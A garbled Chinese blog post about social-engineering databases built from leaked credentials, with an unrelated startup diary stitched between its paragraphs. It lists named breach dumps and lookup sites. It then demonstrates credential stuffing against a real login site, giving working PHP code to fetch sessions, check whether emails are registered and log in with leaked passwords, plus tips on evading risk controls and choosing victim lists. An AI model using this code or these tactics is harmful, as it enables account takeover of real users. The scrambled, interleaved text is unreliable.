社工库小说

“社工库”这么些词多个人口并无生,而且为发愈来愈多之信息最先提及社工库,比如:
1.
2016年四月,河北包头公安机关网络安全侍卫部门遂侦破一起侵犯公民个人消息案,抓获犯罪嫌疑人8号称,捣毁国内最为酷之网络社工库“K8社工库”(www.k8sec.com),查获公民个人音讯20亿久。
2.
2016年18月,南都记者700元即使买到同事行踪,包括乘机、开房、上网吧等11码记录,很多数源自社工库。

  前几日打算写一篇断流水式的行文,哈,不听从正常的写照格式和了。

社工库这么些产业链一贯很热烈,不过国家吗以打击,搜索“社工库”,你相会发觉它是单敏感词。

  话说创业到本,也尽快接近一半年了,时间这是飘扬的一个字:快!

声称:请不使用社工库从事非法作业,本篇著作就提供就学商量。

  从设想的成百上千不胜远,到于人络绎不绝报告要单点突破;从美好的远景,到具体困难的进行;创业还如是平段子修行的行程。

图片 1 

  这一块齐,好多转业,看起非凡困难或者不容许的事,做起来,其实并不曾呀特别困难,一切都是可以解决之,只是熟习度的题材,坑的凡日。

  从初叶到近期,快半年矣,产品经营第一等是好兼任的,即便设计下的成品没有苍井老师那么美,但为是认真考虑了之,有自己的角度:技术,运营成本,开发时间。

以谈社工库往日,大家先说说啊是社工(即社会工程学),有多少个社会工程学的概念需要精通:
1. 社会工程学攻击且起以使人头定暴发体味偏差的功底及,熟知的社会工程师如故善举行音讯征集的身体力行者。
2.
社会工程学是同样种植通过对事主心境弱点、本能反应、好奇心、信任、贪婪等思想陷阱举办诸如欺骗、伤害等侵害手段。
3.
社会工程学是同等种植黑客攻击方法,利用欺骗等招数骗取对方信任,获取机密新闻。
4.
社会工程学是相同种植使性脆弱点、贪婪等等的心情表现展开抨击,是防不胜防的。

  有时候很简短的制品,并无是坐大道至简,只因为资产至简。

社会工程学本来是平宗学问,但是坐所举办的事务多是不佳的,所以是词逐渐变成了贬义词,甚至被看“违背了人性之德行”。

  创业发出无起压力?话说,其实如就自己这种既看透红尘的外星人,压力怎么能没有啊,有时候压力好及吧会面去吆喝喝上之农药。

i春秋有雷同篇帖子在座谈社会工程学:

  压力这种事,显著有震感的就少于转头,一扭转是寻找不至成品主任的时段,陪吃陪喝陪聊,就不同陪睡,聊人生聊理想聊未来,就差聊孩子,最终家要控制回家陪老伴孩子睡沉,我耶大干净吗,咋会无压力,嗯,最后就是自己上了。

公如何看待黑客的社会工程学?

  这拨还一直不找到运营首席执行官,感觉和齐扭转一样样。

自己当,高尚了说,社工是一致家艺术,操纵人的章程。即使说“违背了人性的道”,那么多双亲哄骗小孩,利诱小孩,未尝不是平种“操纵人心”。社工无罪,问题在于攻击我,如假使爱国、为了维护国家利益而动社工进行抨击,社工肯定会叫看“高大上”。

  其实,有时候压力实在是祥和给协调之,找不顶,只因心里始终想着找到好合适的人头,但挺合适的人口,就如索目的同,茫茫人海总难相遇。

于网安全攻防探究着,我于喜欢社会工程学、也于敬畏社会工程学,相比较叫此外的广阔攻击(比如sql注入),社会工程学有着其自己迷人的处在:

  放低要求,凑合一个,其实也许人,并无为难寻,也许也虽然一贯不这多压力和设法了。

  1. 情感
    经常我们接触的再多的凡基于理性之抨击,而社会工程学,我觉得自打至的企图是感性攻击,。前者,黑客更倚重于智商和逻辑,后者重青睐于商事以及更。最直接的事例,暗恋一个四姐,如何破她?不论怎么攻击,社工应该是少不了的,情商越强,发挥社工的威力更老。

  2. 效率
    和按照技术相比较,社工在片气象下,可以带来重新尖锐的口诛笔伐。比如,拿在广泛密码暴力破解一个人口之账号;可能速度不如搜集一下外的要旨音讯,破解来的再快。集团筹划了多重叠阳泉预防,珍视中央数据,需要一致难得一见下;那么深可能装作一个让了委屈的用户来欺骗客服来赢得权力,这种艺术再一次实惠。

  3. 可能性
    丁是繁体的,机器是01。攻击一华服务器,结果=攻击者的技能+服务器的败笔,结果既决定。而社会工程学可以拉动极致可能,今日成功,不意味前天吗成功;攻击张三能打响,不代表攻击李四为会成。就连攻击者本人,也是未明明的,攻击者本身的状态,都可能会晤潜移默化社工的成功吗。与服务器攻击相比,社工的不确定性,我认为更具备艺术感。

  中间,也面试了几乎单营业的,虽聊的角度各有不同,但最后都回归尘土,迎接地气。

  • 社工库

  有的还指出我连几独外包,活下来,然后坐档养产品,偷偷的游说词:其实当中也已经花了濒临两三独周一去忙就行,只是苍天不仁,暴发有事故,最终又返主路线来。

社工库,是社会工程学中所用到的数据库。

  最近,也同简单只受宇哥的人口且了聊,其中一个宇哥是这时于是了自己写的IISLogViewer这些软件,因好奇作者是啊人,然后找到自己的,这周日去了外的公司聊了零星单多钟头,基本的定论就是是:他即使受限自己之性格,也受限他的爱人,倾听他吐槽完人生,我就是离开了。

方提到了,社会工程学的一个维度就是信搜集,比如指定一个手机号,就会赢得到是手机号潜的所有者音信,包括姓名、邮箱、身份证、籍贯、社交账号等等音讯,这些信就是是社工库。

  另一个被宇哥的,是道电影的,讲了几年录像(宇哥讲电影),播放量仍然单独发1w多,他说他心灵老羡慕那几十万上百万播放量的食指,也想过是否放任。

这个音信数据,少则几百万,多则上亿,重要来源于是每大商厦之安全漏洞,导致数据让黑客窃取。社工库是从二〇一一年始,显示了暴发式增长,归其因,这同年生大量之用户数据外泄。这是自沾的音信,二零一一年尽管生出上亿数据外泄:
2011.03-多打游戏网-800万-txt.rar
2011.03-织梦CMS官网数据库-34万-sql.zip
2011.04-766游戏网-12万-sql.rar
2011.04-IS语音-969万-txt.zip
2011.04-Amazon华夏购买者新闻-20万.zip
2011.04-凡客诚品买家消息-20万-Excel.zip
2011.04-当当网买家信息-101万-Excel.zip
2011.04-爱拍游戏网-1100万-txt.zip
2011.04-蹲屿游戏社区-2683万-txt.rar
2011.05-香港市银行大额客户-21万-xls.rar
2011.05-木蚂蚁-13万-sql.zip
2011.07-土木在线-540万-sql.zip
2011.10-178游戏网-1000万-txt.rar
2011.10-CSDN.NET-600万-sql.rar
2011.10-嘟嘟牛-66277-txt.rar
2011.11-7k7k小游戏-2000万-txt.rar
2011.11-人人网-500万-txt.rar
2011.12-天涯社区-4000万-txt.rar
2011.12-Taobao买小卖家邮箱-2500万-txt.zip

  还好外的影讲解的还不易,有一样批忠实的粉襄助在,我耶和他说,坚贞不屈吧,少年。

社工库的价值在于查询,假设有更多多少,而非可知好好之查询,那么大不便发挥其价。所以市场上出不少做社工库查询的网站。往日出现了累累在线社工库查询网站,但由于“各个原因”,大部分都叫关了。现在能访问,大部分还用FQ使用,这里选出多少个例子:
https://qun.findmima.com/ 
 —社工库更新较及时,涵盖账号、qq等六个维度
https://haveibeenpwned.com/  —外国出名社工库查询网站
http://s.70sec.com/ 
 
    
   —收录数量超越300亿

  就如自家之CYQ.Data或十二星星座框架一样,小众,但却精品。

图片 2 

  有时候有创业人数之权在一齐,大多数都是说着看看有啊资源会共享或合作等等的,但极致实用的都依然那一点相互慰藉的语句。

  • 社工库价值

  关于产品之开发进度,明天于本人的微信公众号里宣布:

一说到社工库、音信泄露,我们都晤面相比较喉咙疼,比如千万层酒馆开房多少泄露,导致了有家争辩、甚至离婚。

  女性端的《IT恋》总算审核通过了,不过起对象发现报还爆发Bug,还得又调整立异版本;

有大型社工库网站开展了PV的查,有只能玩的数量,仅供参考,不举行其他结论:

  IT男端的《IT连》总算提交上审查等了。

  1. 宝强离婚案期间,社工库搜索量是平常底5倍之多。
  2. 过年前后,社工库搜索量是历年最为少之时光。
  3. 国之一部分定位会议里,网站受攻击的次数会明确多。

  关注自身多年来创业情形的好扫我公众号:

社工库的询问音讯,是豪门最广的行使方法,所以重重黑产做了收费的查询系统。除了信息查询,其实社工库还足以让用来开另外有价的事务,比如对片于曝出底社工库,大家可进行多少解析。我们可以开过多生出价、有趣的工作。

  图片 3

对千万级别开房多少,很多还记录了地址,经过采样分析多博士开房,登记的地方都是上下一心的学府名字:
新加坡市衡阳路220如泣如诉厦大高校跃进楼
法国首都市荆州路220号北大大学生命科学大学
迪拜市武川路78打出(复旦大学北区学生公寓)
香港市西宁路220号复旦高校物理楼

  刚刚房东这边发来了她们写的股权投资协定,我概括扫了千篇一律整个,这内容,是于咱形容的清晰和正规,条款吗大半矣有的,可是暂放一下,先勾勒了文章再说了。

图片 4 

  才刚刚想继承写著作,智联招聘的客服来电话了,说看来51job上大家在招运营首席营业官,问我们要无设猎头服务?

俺们好针对地方举行分词,找到各类大学的数额,并开展统计。会意识,新加坡同济大学之生开房比复旦大学的生若多,而同济嘉定校区以于四同等路校区大半。嘉定校区是郊区,而固原路处于繁华城区,通过数量,可以这么看,市区的生在再增长,而郊区的学员再一次寂寞。和同济大学比,交大监管或重严酷一些。作为业主,在同济投资一个平价店,也许是一个科学的挑选。等等。。。有趣吧~

  话说自家于你们猎聘上啊发过那种职位啊,为啥要就是从别人家看看底呦?

主要python工具:
pandas:数据搜集,分析/清洗,内存处理,千万层中的数码。 
matploylib,seaborn:用作可视化分析。 
bokeh:地图,热力图,处理好数据量。

  我说于你们网站上发布了岗位,一个投简历的也罢不曾呀(其实我以说谎,是来收取过相同份)。

还按,每年还会面发出权威机构对广大密码举行总计,外国最酷约炮网站国家分布图,等等,这多少个也都是自社工库调研要来之。甚至有人恶作剧,“社工库推进了依照社会的怪数额解析”。

  人家说:你刚刚注册的时节便告知了您,是没有人照的,都是设主动搜或大家援助你找。

于社工库的数目解析,有几许需专注,就是学会清洗数据,比如星座分布这种一般就是不依赖谱,因为大部分网站要用户不填数据,默认都是六月1日,即使盲目总括,你相会发现摩羯栋占比可是多。

  我说自啊想什么,但。。。没钱啊!

  • 祸的极——撞库

  反正讲同样积聚,最后便是:倘使不考虑猎头服务,可以吃自己申请1年2000差不多之铺版服务,可以发职位和搜低端人才简历服务,我只可以中断谈话,继续写篇了。

对此企业而言,社工库最深的有害就是逢库,没有之一。撞库,顾名思义,就是黑客通过社工库的早已知道账号以及密码,去学登陆其他铺面网站,最后赢得了一样批判得登录那多少个网站的数。

  回头看了生自家的QQ空间:

对此账号安全,很多小卖部依然挺快的,比如今日头条数据外泄的新闻刚一出去,和讯公关就霎时到处发布表明说网易很安全,数据泄露和知乎没关系,而是黑客从这么些年之另外各大商家数量泄露被提了具有乐乎邮箱账号,结尾又重表明知乎多么重视用户安全。

  图片 5

列大集团,当起账号数据外泄的时段,都是竭尽至极撇清关系,再说六个事。

  忽然才想起,其实最早计划的获利思维,就是做招聘。

一个凡是2014年终,12306网站十几万用户数据外泄,我立马特别测试了产,大部分账号都得登录。依照道理说,这个账号只要泄露,应该第一时间冻结这多少个账号,以免受到攻击者攻击。而12306却非是,不但没珍爱那些受害用户,反倒是第一时间表明自己并未尾巴,这多少个数据来自外网站的纰漏,而用户以12306以了与此外有漏洞网站同之账号以及密码。这虽是所谓的“撞库”。

  只坐家说,投资人还在意于投资解决单一问题之类型,所以中级就定位为IT版陌陌,却发现这种社交格局是相当为难赚的。

次只业务,是二〇一八年百度网盘有雅量用户投诉,自己之网盘资料被莫名删光,并塞满了日本动作片,疑似数据泄露。同样的问题,厂商处理问题同的老路————用户们,那跟大家百度没关系,这是黑客通过撞库入侵了你们的账号。你们自己之账号密码,曾经于第三着平台泄露了,被攻击的用户等,你们改密码吧,你们密码不安全。

  要致富就是得一定为IT百协办,从线及对接到线下服务,在不知不觉吃,发现我之想想,被同样众多专家带来飞了,带飞了,飞了。

某个公司数据库泄露,集团的富有账号密码被窃取,也即便是伎俩数据(比如京东12G数就是是手段数据),有多少个点需要注意:

  怪不得创业那长长的总长更加走心更怪,原来逐步就去了当时考虑的轨迹。

  1. 对此黑产而言很关键,这里带有了大量的用户的账户与密码。
    2.
    是因为多用户不同网站设置了一样密码,这一个手法数据,几乎可登录用户注册了之各网站。
  2. 柜对此团结的数额泄露,需要负一切专责。

  让我们见不善去吧,哈,我若动自己的路程〜〜开发IT聘!!!

复来拘禁所谓的二手数据,什么是二手数据为?黑客窃取到有大型集团的招数数据,用这些数量去学登陆网站B,将登陆成功的数目举办集中,获得平等批B网站的账号密码,那一个数量就是是二手数据。不要轻视二手数据,因为这一个多少是可以操作B网站用户的,比如百度网盘数据泄露、12306数码外泄,都属二手数据。那么二手数据为起几乎单特色:

  

  1. 凡手法数据的一个子集,往往数据规模较小,几十万及几百万休抵。
  2. 危害性同一手数据一致大,对用户造成严重安全题材。
  3. 集团一般不甘于承担责任,认为是用户自己之题材。

  

随近年来数泄露,公司攻击来拘禁,每年还起恢宏之二手数据攻击,以及出售用户消息和网站资产。

用户以某某网站登记了账号,结果是网站及之数据给黑客窃取了,或者篡改了,然后网站语用户“网站大安全”,但是结果是用户被攻击了。那么对用户而言,他的损失什么人来担?从过去底组成部分案例来拘禁,那类攻击整个出于用户自己当。那么问题来了,用户稀里纷纷扬扬的受攻击被损失,还要协调承担责任,我们都精通哪个做错何人负责,用户做错了哟?

  1. 哪位受用户将每个网站设置成同一个密码。
  2. 用户不该据此好被公开泄露的密码。

如上回答,便是有厂商的态势,这么些厂商根本就是不负责任。
1.
功效户而言,根本未理解自己之账号密码已经给泄露,也没有渠道得到自己之账号密码被外泄。
2.
招数据而发布,公司、国家都合并了指令的删帖、删消息、关闭泄露源,根本无受用户知情权。

综述,我当,无论手法数据、依旧二手数据,都该由合作社自己背相应的责任,集团出白管所有用户之账号数量安全

自己要好举办测试,通过社工库数据,对某外国社交网站举办撞库,测试结果如下:
100万数目,邮箱和相应密码
约2.8万信箱,为该网站注册用户
其中1.8万,撞库成功

也就是说,用100万社工数据,轻松到手社交网站1.8万底诚实用户之账号和密码,危害相当深。得到这么些账号之后,我得以做营销、做推广、发垃圾信息,等等。

再有一个接触,不晓我们只顾到没,2.8万报了名中,有1.8万相逢库成功,也就是说有64%用户在该网站拔取了同社工库相同之密码。换句话说,超越一半用户,会当多独网站拔取同一密码。毕竟,让一个用户在不同网站因而不同密码,用户很麻烦记住那么多密码的。

于这过程被,目的网站并无有系统漏洞,可是黑客也可轻松窃取大量用户账号,总之,对合作社之侵蚀程度起差不多可怜。

  • 社工库攻击演示

这边以i春秋为例,大家开一个测试攻击,来为大家演示咋样撞库。整个经过非凡简单,主旨点就是抓包。

图片 6 

i春秋的登陆curl:

curl ``'https://user.ichunqiu.com/login/signin'

-H ``'Host: user.ichunqiu.com'

-H ``'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0'

-H ``'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

-H ``'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'

-H ``'Accept-Encoding: gzip, deflate, br'

-H ``'Referer: [url]https://user.ichunqiu.com/login?s=bbs&r=http%3A%2F%2Fbbs.ichunqiu.com%2Fportal.php'``[``/url``]

-H ``'Cookie: __jsluid=976fa33f9dadc6a6cdcfcf4fedac6a2e; pgv_pvi=5174663168; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_9104989ce242a8e03049eaceca950328=1487724876,1487819978,1488156372,1489480870; Hm_lvt_1a32f7c660491887db0960e9c314b022=1487752132,1488156372,1488761264,1489366264; browse=CFlaTxUYU0xdWBtPX0hTV1tTWUJDQVpYWVRIRFlLWURTUF5XVRhTQF5UWkBVAlNEUFlKR15AXlhZUEVFV1FYRVNRWk9eREtOFA; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1489563769; pgv_si=s1121205248; Hm_lpvt_9104989ce242a8e03049eaceca950328=1489563769; ci_session=8cde5cded8fd1e220ac3d58eb4efb4ae33a45c12'

-H ``'Connection: keep-alive'

-H ``'Upgrade-Insecure-Requests: 1'

-H ``'Content-Type: application/x-www-form-urlencoded'

--data ``'username=name%40mail.com&password=111111&yzm='

末尾之data就是post的传参,包括账号及密码。经过测试,发现i春秋做了特处理,尽管只改data的账号和密码,尽管传递的是正确账号密码,也无相会登陆成功。经过排查,最后认可,i春秋的登陆,除了账号和密码,还和ci_session有涉及,而其他的始末都得以去,最终简化成:

[Bash shell] 纯文本查看 复制代码

?

1
2
3
curl 'https://user.ichunqiu.com/login/signin'
-H 'Cookie: ci_session=8cde5cded8fd1e220ac3d58eb4efb4ae33a45c12'
--data 'username=name%40mail.com&password=111111&yzm='

再也测试发现,相同ci_session,登陆不同之账号,无法得逞,也就是说一个ci_session只可以用来登陆一个账号。那么哪些社团一个可行的session呢?很简短,模拟访问同一赖登陆的网页即可。最终模拟登陆的代码如下:

[PHP] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<?php
function get_session()
{
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL, 'https://user.ichunqiu.com/login/signin');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0');
        curl_setopt($ch, CURLOPT_COOKIE, '__jsluid=976fa33f9dadc6a6cdcfcf4fedac6a2e; pgv_pvi=5174663168; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_9104989ce242a8e03049eaceca950328=1487724876,1487819978,1488156372,1489480870; Hm_lvt_1a32f7c660491887db0960e9c314b022=1487752132,1488156372,1488761264,1489366264; uid=NcjxQpwhMpDiEc3hKujnFqoieuTE0NWtj; browse=CFlaTxUYU0xdWBtPX0hTV1tTWUJDQVpYWVRIRFlLWURTUF5XVRhTQF5UWkBVAlNEUFlKR15AXlhZUEVFV1FYRVNRWk9eREtOFA; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1489482188; pgv_si=s1121205248; ci_session=1ec3b928692283db3052ee77534c38f735b739ca; Hm_lpvt_9104989ce242a8e03049eaceca950328=1489482188');
        $output = curl_exec($ch);
        if(false == $output)
        {
                echo 'session error';
                return false;
        }
        preg_match('/ci_session=(.*?);/', $output, $match);
        if(!$match[1])
        {
                echo 'session error';
                return false;
        }
        return $match[1];
}
 
function login($account, $password)
{
        $session = get_session();
        if(!$session)
        {
                return false;
        }
        $data = http_build_query(array('username' => $account, 'password' => $password, 'yzm' => ''));
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL, 'https://user.ichunqiu.com/login/signin');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0');
        curl_setopt($ch, CURLOPT_COOKIE, "ci_session=$session;");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $output = curl_exec($ch);
        if(strpos($output, '302 Found'))
        {
                return true;
        }
        else if(strpos($output, '200 OK'))
        {
                return false;
        }
        else
        {
                echo 'login error';
                return false;
        }
}
#login($account, 'your password');

动用已经知社工库,进行测试,流程通的!可以登录i春秋的账号数据,非凡少,那不难领悟,毕竟ichunqiu受众用户就大少,如图,密码我打了斯科普里克。可以登陆的账号,打印了举世瞩目标ok!!!!!

图片 7 

  • 优化攻击提高功效

刚说及了,利用社工库攻击i春秋,需要发送两糟呼吁,一赖是渲染登陆页面拿到session,一潮是带动在session和社工库账号登陆。

眼看简单单请求万分缓慢!!!平均2秒到3秒才会爆破一个账号,固然写多线程,也是非凡没用的。

怎么着优化?

森店除提供登陆,为了用户体验,往往还提供了一个关键接口:检查账号是否也已经注册账号。在社工库攻击被,这一个接口有着首要的位置,因为:
1.
反省账号接口,由于未需要般配密码,去除了加密及比较流程,接口速度杀抢。
平均攻击速度,从秒级变成皮秒级。

  1. 本条接口,可以助我们筛选暴发咋样是报账号,哪些是非注册账号。
    100万底社工库,神速筛出符合爆破的几万社工库。
  2. 咱只针对登记账号举办模拟登陆,最老限度的滑坡了密码爆破的次数。
    相似,集团会对登陆做安全风控,而减去登陆的频次,可以绕了商家安全检测。

i春秋的账号检测,在此间:
图片 8 

检测代码如下:

[PHP] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
<?php
function check($account)
{
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL, 'https://user.ichunqiu.com/registerCtl/chkmail');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $data = http_build_query(array('email' => $account));
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $output = curl_exec($ch);
        if('false' == $output)
        {
                return false;
        }
        return true;
}
#check('name@mail.com');

优化后底流程是:

  1. 检测账号是否也报账号。
  2. 看登陆页面,获取session。
  3. 带来在session,账号,密码,模拟登陆i春秋。
  4. 笔录登陆成功的社工库。

安,社工库利用相当简单吧。

声称:为了珍视i春秋,避免造成安全风险。仅尝试了5只里头的信箱爆破成功,其他爆破都用借账号,并不曾得到另外实质数据。

另外,还有哪些路搭攻击的效能以及成功的票房价值为?这里不做深远开展,给点儿只思路:
1.
所以csdn的社工库,爆破i春秋,比用天涯社区的社工库爆破,成功率更胜。csdn和i春秋,交集更要命,道理分外粗略也!

  1. i春秋的qq群,就是老好之qq社工库筛选标准,你领会。

因i春秋的燕国群为例,群里有1340大抵人。

图片 9 

经测试,其中472独qq邮箱,为i春秋的挂号账号。
图片 10 

这一个账号被,共存在*(敏感词)个账号可以吃破解:

  1. 30+单账号,使用了相应之社工库密码
  2. 10+个账号,使用top10弱密码。
  3. 10+独账号,使用了ichunqiu、chunqiu等根本词作为密码。
  4. 5+只账号,使用了qq号码、qq名字作密码。

下边的信息,你,信么?

信不信无所谓,别当及退潮的下,才通晓自己以裸泳。

总之:

  1. 社工是一律派系艺术,我们毫不无脑的使用社工库。
    2.
    增高自己之账号、密码安全意识,减弱给公司的票房价值。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图